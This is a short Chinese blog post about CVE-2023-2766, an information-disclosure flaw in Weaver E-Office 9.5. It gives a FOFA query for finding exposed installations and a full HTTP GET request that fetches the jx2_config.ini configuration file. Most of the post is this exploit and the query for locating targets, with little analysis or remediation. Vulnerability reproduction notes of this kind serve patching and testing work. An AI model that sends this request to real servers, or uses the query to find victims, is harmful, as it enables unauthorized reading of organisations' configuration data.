CVE-2023-2766

一. 漏洞描述

泛微 E-Office 是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。该产品 configfile
存在信息泄露

二. 漏洞影响版本

E-Office 9.5

三. 网络空间测绘查询

fofa

app="泛微-Eoffice"

四. 漏洞复现

GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

img

posted @ 2024-10-22 14:11  kalixcn  阅读(27)  评论(0编辑  收藏  举报